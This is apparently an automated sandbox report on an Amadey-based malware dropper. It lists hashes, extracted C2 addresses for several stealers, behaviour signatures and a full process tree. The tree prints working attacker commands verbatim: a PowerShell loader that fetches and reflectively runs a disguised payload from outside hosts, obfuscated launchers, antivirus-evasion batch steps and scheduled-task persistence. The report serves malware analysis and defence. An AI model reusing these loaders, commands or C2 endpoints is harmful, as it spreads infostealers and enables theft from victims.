Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    106s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20250207-en
  • resource tags

    arch:x64, arch:x86, image:win7-20250207-en, locale:en-us, os:windows7-x64, system
  • submitted
    08/03/2025, 15:45

General

  • Target

    fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe

  • Size

    1.8MB

  • MD5

    e74b537fdba9af9c83579432d7107627

  • SHA1

    5127e6d77e38aca75a65f529444f719121b49416

  • SHA256

    fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6

  • SHA512

    2dec46234f2766f7c2ac7a3b958a15724f3d3fe79d3fd19b027755a75dabb8bc338e9f70bf3e4d9387cb1d4df7ffc1b453caf58d65697d4792454b912c5b581d

  • SSDEEP

    49152:9iaa2xk0sV9LEstt/P8LA6XL2DGlf2XKZY:c2OR3EsH/kLA02SeXKa

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

redline

Botnet

Build 7

C2

101.99.92.190:40919

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 1 IoCs
  • Detects Healer, an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer is an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Sectoprat family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell with the display window hidden.

  • Downloads MZ/PE file 14 IoCs
  • .NET Reactor protector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 25 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 62 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 12 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 10 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 3 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1196
      • C:\Users\Admin\AppData\Local\Temp\fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe
        "C:\Users\Admin\AppData\Local\Temp\fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2336
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2720
          • C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe
            "C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2988
          • C:\Users\Admin\AppData\Local\Temp\10142170101\4189e09c15.exe
            "C:\Users\Admin\AppData\Local\Temp\10142170101\4189e09c15.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:848
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 1200
              5⤵
              • Loads dropped DLL
              • Program crash
              PID:596
          • C:\Users\Admin\AppData\Local\Temp\10142180101\4jblLC1.exe
            "C:\Users\Admin\AppData\Local\Temp\10142180101\4jblLC1.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2028
            • C:\ProgramData\WMIsys\CONAtdrive.exe
              "C:\ProgramData\WMIsys\CONAtdrive.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious use of WriteProcessMemory
              PID:1652
              • C:\Windows\SysWOW64\schtasks.exe
                "schtasks.exe" /create /tn WMIsys /tr "C:\ProgramData\WMIsys\CONAtdrive.exe" /st 15:46 /du 23:59 /sc daily /ri 1 /f
                6⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2532
          • C:\Users\Admin\AppData\Local\Temp\10142200101\2cd9a90288.exe
            "C:\Users\Admin\AppData\Local\Temp\10142200101\2cd9a90288.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:936
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              5⤵
              • Downloads MZ/PE file
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2444
          • C:\Users\Admin\AppData\Local\Temp\10142210101\0102b962a1.exe
            "C:\Users\Admin\AppData\Local\Temp\10142210101\0102b962a1.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2324
          • C:\Users\Admin\AppData\Local\Temp\10142220101\516d293752.exe
            "C:\Users\Admin\AppData\Local\Temp\10142220101\516d293752.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2468
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              5⤵
              • Downloads MZ/PE file
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1780
          • C:\Users\Admin\AppData\Local\Temp\10142230101\3a084e6b3d.exe
            "C:\Users\Admin\AppData\Local\Temp\10142230101\3a084e6b3d.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1760
            • C:\Users\Admin\AppData\Local\Temp\10142230101\3a084e6b3d.exe
              "C:\Users\Admin\AppData\Local\Temp\10142230101\3a084e6b3d.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              PID:1708
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 1020
                6⤵
                • Loads dropped DLL
                • Program crash
                PID:2792
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 500
              5⤵
              • Loads dropped DLL
              • Program crash
              PID:1764
          • C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe
            "C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            PID:2584
            • C:\Windows\system32\cmd.exe
              cmd.exe /c 67cc62a429f2f.vbs
              5⤵
                PID:1528
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"
                  6⤵
                    PID:2684
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '[obfuscated base64 payload omitted]';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                      7⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2804
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                        8⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2648
              • C:\Users\Admin\AppData\Local\Temp\10142260101\m4mrV1B.exe
                "C:\Users\Admin\AppData\Local\Temp\10142260101\m4mrV1B.exe"
                4⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:844
                • C:\Windows\system32\cmd.exe
                  cmd.exe /c 67cc62a429f2f.vbs
                  5⤵
                    PID:3008
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\67cc62a429f2f.vbs"
                      6⤵
                        PID:1500
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '[obfuscated base64 payload omitted]';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                          7⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:824
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                            8⤵
                            • Blocklisted process makes network request
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1120
                  • C:\Users\Admin\AppData\Local\Temp\10142270101\4jblLC1.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142270101\4jblLC1.exe"
                    4⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2972
                  • C:\Users\Admin\AppData\Local\Temp\10142280101\XxzH301.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142280101\XxzH301.exe"
                    4⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:1956
                  • C:\Users\Admin\AppData\Local\Temp\10142290101\ReK7Ewx.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142290101\ReK7Ewx.exe"
                    4⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:2708
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
                      5⤵
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:2756
                      • C:\Windows\SysWOW64\expand.exe
                        expand Ae.msi Ae.msi.bat
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2200
                      • C:\Windows\SysWOW64\tasklist.exe
                        tasklist
                        6⤵
                        • Enumerates processes with tasklist
                        • System Location Discovery: System Language Discovery
                        PID:1988
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr /I "opssvc wrsa"
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:3028
                      • C:\Windows\SysWOW64\tasklist.exe
                        tasklist
                        6⤵
                        • Enumerates processes with tasklist
                        • System Location Discovery: System Language Discovery
                        PID:748
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:1692
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c md 789919
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:556
                      • C:\Windows\SysWOW64\extrac32.exe
                        extrac32 /Y /E Deviation.msi
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2160
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr /V "Brian" Challenges
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:1384
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2264
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:1860
                      • C:\Users\Admin\AppData\Local\Temp\789919\Occupation.com
                        Occupation.com q
                        6⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:2700
                        • C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
                          C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
                          7⤵
                            PID:1096
                        • C:\Windows\SysWOW64\choice.exe
                          choice /d y /t 5
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:2028
                  • C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe"
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    PID:1600
                    • C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe
                      "C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe"
                      5⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:2952
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 1028
                        6⤵
                        • Loads dropped DLL
                        • Program crash
                        PID:2668
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 500
                      5⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:2836
                  • C:\Users\Admin\AppData\Local\Temp\10142310101\yUI6F6C.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142310101\yUI6F6C.exe"
                    4⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2684
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 1200
                      5⤵
                      • Loads dropped DLL
                      • Program crash
                      PID:888
                  • C:\Users\Admin\AppData\Local\Temp\10142320101\ADFoyxP.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142320101\ADFoyxP.exe"
                    4⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:3032
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                      5⤵
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:2680
                      • C:\Windows\SysWOW64\expand.exe
                        expand Go.pub Go.pub.bat
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:1604
                      • C:\Windows\SysWOW64\tasklist.exe
                        tasklist
                        6⤵
                        • Enumerates processes with tasklist
                        • System Location Discovery: System Language Discovery
                        PID:2960
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr /I "opssvc wrsa"
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:1992
                      • C:\Windows\SysWOW64\tasklist.exe
                        tasklist
                        6⤵
                        • Enumerates processes with tasklist
                        • System Location Discovery: System Language Discovery
                        PID:1900
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2060
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c md 353090
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2040
                      • C:\Windows\SysWOW64\extrac32.exe
                        extrac32 /Y /E Really.pub
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2064
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr /V "posted" Good
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:992
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2576
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2696
                      • C:\Users\Admin\AppData\Local\Temp\353090\Seat.com
                        Seat.com m
                        6⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:824
                        • C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                          C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                          7⤵
                          PID:1708
                      • C:\Windows\SysWOW64\choice.exe
                        choice /d y /t 5
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2872
                  • C:\Users\Admin\AppData\Local\Temp\10142330101\zY9sqWs.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142330101\zY9sqWs.exe"
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of FindShellTrayWindow
                    PID:1724
                    • C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                      "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
                      5⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:2936
                  • C:\Users\Admin\AppData\Local\Temp\10142340101\CgmaT61.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142340101\CgmaT61.exe"
                    4⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2244
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 1188
                      5⤵
                      • Program crash
                      PID:2180
                  • C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe"
                    4⤵
                    PID:2060
                    • C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe
                      "C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe"
                      5⤵
                      PID:1624
                    • C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe
                      "C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe"
                      5⤵
                      PID:2656
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 500
                      5⤵
                      • Program crash
                      PID:2928
                  • C:\Users\Admin\AppData\Local\Temp\10142360101\3df5e5788d.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142360101\3df5e5788d.exe"
                    4⤵
                    PID:2924
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1188
                      5⤵
                      • Program crash
                      PID:560
                  • C:\Users\Admin\AppData\Local\Temp\10142370101\75c1ef65a5.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142370101\75c1ef65a5.exe"
                    4⤵
                    PID:2660
                  • C:\Users\Admin\AppData\Local\Temp\10142380101\775a1069e0.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142380101\775a1069e0.exe"
                    4⤵
                    PID:2428
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /F /IM firefox.exe /T
                      5⤵
                      • Kills process with taskkill
                      PID:1820
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /F /IM chrome.exe /T
                      5⤵
                      • Kills process with taskkill
                      PID:1948
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /F /IM msedge.exe /T
                      5⤵
                      • Kills process with taskkill
                      PID:2160
                  • C:\Users\Admin\AppData\Local\Temp\10142390101\b71d0f89d2.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142390101\b71d0f89d2.exe"
                    4⤵
                    PID:1500
                  • C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
                    4⤵
                    PID:2752
                    • C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
                      "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
                      5⤵
                      PID:2056
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 500
                      5⤵
                      • Program crash
                      PID:1560
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
                2⤵
                • System Location Discovery: System Language Discovery
                PID:1696
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
                  3⤵
